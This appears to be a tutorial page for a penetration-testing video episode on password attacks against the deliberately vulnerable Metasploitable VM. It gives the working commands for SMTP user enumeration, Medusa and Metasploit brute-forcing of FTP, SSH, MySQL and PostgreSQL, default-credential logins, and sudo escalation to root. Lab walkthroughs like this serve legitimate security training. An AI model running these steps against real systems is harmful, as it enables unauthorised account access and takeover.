#HackOnTuesday Episode 2 Attacking Passwords and Cracking Hashes

Among the skills that a penetration tester must have there is the ability to attack passwords and crack hashes. In this episode of #HackOnTuesday, we go through some tools and techniques to attack weak passwords for the most common services such as FTP, Telnet and SSH, just to name a few. After having cracked several passwords, Gianni moves on and uses a common sudo misconfiguration to get root access on the Metasploitable VM.

Tools, Scripts, and Exploits

The tools,scripts, and exploits used in this episode of #HackOnTuesday are:

» Nmap (https://nmap.org/)
» Medusa Parallel Network Login Auditor (http://foofus.net/goons/jmk/medusa/medusa.html)
» Wordlists (https://wiki.skullsecurity.org/Passwords)

Steps

» Identify the services listening on the target
   • nmap -v -sV 192.168.75.149 -p-
» Test if VRFY, RCPT, or EXPN are enabled.
   • nc 192.168.75.149 25
   • RCPT TO:mike # This returns an “Error: need MAIL command” message.
   • EXPN mike # This returns an “Error: command not recognized” message.
   • VRFY mike # This returns a “Recipient address rejected” message.
   • VRFY root # This works fine!
» Enumerate the local users via SMTP
   • With Nmap:
      - nmap –script smtp-enum-users.nse 192.168.75.149 # In this case, we get a “Method RCPT returned a unhandled status code.” message. As seen before, the RCPT method returns an error.
   • With Metasploit:
      - msfconsole
      - use auxiliary/scanner/smtp/smtp_enum
      - show options
      - set RHOSTS 192.168.75.149
      - set USER_FILE /home/kusanagi/metasploitable/wordlists/usernames.txt
      - set THREADS 20
      - run
» Attack the FTP service (port 21)
   • medusa -h 192.168.75.149 -U ftp_usernames.txt -P ftp_passwords.txt -e ns -M ftp -v 6 -t 10 -O ftp.log
   • ftp 192.168.75.149 # Username: msfadmin , Password: msfadmin
   • cd vulnerable
   • ls
   • exit
   • ftp 192.168.75.149 # Username: user, Password: user
   • ls
   • exit
» Attack the SSH service (port 22)
   • medusa -h 192.168.75.149 -U ssh_usernames.txt -P ssh_passwords.txt -e ns -M ssh -t 10 -O ssh.log
» Attack the Telnet service (port 23)
   • telnet 192.168.75.149
   • msfadmin/msfadmin # or user/user
   • uname -a
» Attack the MySQL service (port 3306)
   • msfconsole
   • search mysql
   • use auxiliary/scanner/mysql/mysql_login
   • show options
   • set RHOSTS 192.168.75.149
   • set USER_FILE /home/kusanagi/metasploitable/wordlists/mysql_usernames.txt
   • set PASS_FILE /home/kusanagi/metasploitable/wordlists/mysql_passwords.txt
   • set VERBOSE false # If true, it may take twice as much time to find the password for long wordlists.
   • run
   • mysql -h 192.168.75.149 -u root -p # Password: root
» Attack the PostgreSQL service (port 5432)
   • msfconsole
   • search postgres
   • use auxiliary/scanner/postgres/postgres_login
   • show options
   • set RHOSTS 192.168.75.149
   • run
   • Open a new terminal and connect to the PostgreSQL Server
      - psql -h 192.168.75.149 -d template1 -U postgres -W
      - SELECT version();
      - \q
» Escalate the privileges
   • ssh user@192.168.75.149
   • sudo -i # This returns the “user is not in the sudoers file.” message.
   • exit
   • ssh msfadmin@192.168.75.149
   • sudo -i
   • whoami
» Game over!